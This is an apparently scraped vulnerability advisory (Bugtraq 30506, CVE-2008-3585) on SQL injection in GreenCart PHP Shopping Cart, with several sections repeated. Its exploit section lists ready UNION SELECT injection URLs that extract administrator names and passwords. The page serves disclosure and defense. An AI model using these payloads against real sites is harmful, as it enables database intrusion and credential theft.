GreenCart PHP Shopping Cart 'id' Parameter Multiple SQL Injection Vulnerabilities
BID:30506
Info
GreenCart PHP Shopping Cart 'id' Parameter Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 30506 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-3585 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 01 2008 12:00AM |
| Updated: | May 07 2015 05:25PM |
| Credit: | Hussin X |
| Vulnerable: |
PozScripts GreenCart PHP Shopping Cart 0 |
| Not Vulnerable: | |
Discussion
GreenCart PHP Shopping Cart 'id' Parameter Multiple SQL Injection Vulnerabilities
GreenCart PHP Shopping Cart is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
GreenCart PHP Shopping Cart is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
GreenCart PHP Shopping Cart 'id' Parameter Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/Script/product_desc.php?id=-118+UNION+SELECT+1,2,concat(admin_name,0x3e,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+FROM+sbclassified_admin--
http://www.example.com/Script/store_info.php?id=-118+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(admin_name,0x3e,pwd),18,19,20,21,22,23+FROM+sbclassified_admin--
http://www.example.com/Script/product_desc.php?id=-118+UNION+SELECT+1,2,concat(admin_name,0x3e,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+FROM+sbclassified_admin--
http://www.example.com/Script/product_desc.php?id=-118+UNION+SELECT+1,2,concat(admin_name,0x3e,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+FROM+sbclassified_admin--
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/Script/product_desc.php?id=-118+UNION+SELECT+1,2,concat(admin_name,0x3e,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+FROM+sbclassified_admin--
http://www.example.com/Script/store_info.php?id=-118+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(admin_name,0x3e,pwd),18,19,20,21,22,23+FROM+sbclassified_admin--
http://www.example.com/Script/product_desc.php?id=-118+UNION+SELECT+1,2,concat(admin_name,0x3e,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+FROM+sbclassified_admin--
http://www.example.com/Script/product_desc.php?id=-118+UNION+SELECT+1,2,concat(admin_name,0x3e,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+FROM+sbclassified_admin--
Solution / Fix
GreenCart PHP Shopping Cart 'id' Parameter Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
GreenCart PHP Shopping Cart 'id' Parameter Multiple SQL Injection Vulnerabilities
References:
References:
- GreenCart PHP Shopping Cart Homepage (PozScripts)